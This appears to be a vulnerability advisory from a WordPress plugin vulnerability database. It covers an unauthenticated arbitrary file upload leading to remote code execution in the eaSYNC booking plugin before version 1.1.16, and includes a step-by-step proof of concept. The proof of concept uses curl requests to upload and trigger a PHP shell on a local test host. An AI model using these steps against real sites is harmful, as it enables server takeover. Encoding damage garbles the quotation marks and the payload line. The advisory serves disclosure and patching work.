Lucene search

K
wpvulndbCydaveWPVDB-ID:ECF61D17-8B07-4CB6-93A8-64C2C4FBBE04
HistoryJun 15, 2022 - 12:00 a.m.

eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload

2022-06-1500:00:00
cydave
wpscan.com
39

0.731 High

EPSS

Percentile

98.1%

The plugin suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps.

PoC

1. Create a malicious PHP file: echo ’ /tmp/evil.php 2. Upload it curl -H β€˜Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37’ \ -F β€˜action=easync_session_store’ \ -F β€˜type=car’ \ -F β€˜with_driver=self-driven’ \ -F β€˜driver_license_image2=@/tmp/evil.php’ \ β€˜http://127.0.0.1/wp-admin/admin-ajax.php’ 3. Determine the location where the shell has been uploaded (the β€œd_license_image” should contain the URL to it): curl -H β€˜Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37’ \ β€˜http://127.0.0.1/wp-admin/admin-ajax.php?action=easync_success_and_save’ 4. Trigger the payload by accessing the determined URL, e.g: http://127.0.0.1/wp-content/uploads/cff7779bf2268f97c011ece9fd4c9ab0.php

CPENameOperatorVersion
easync-bookinglt1.1.16

0.731 High

EPSS

Percentile

98.1%

Related for WPVDB-ID:ECF61D17-8B07-4CB6-93A8-64C2C4FBBE04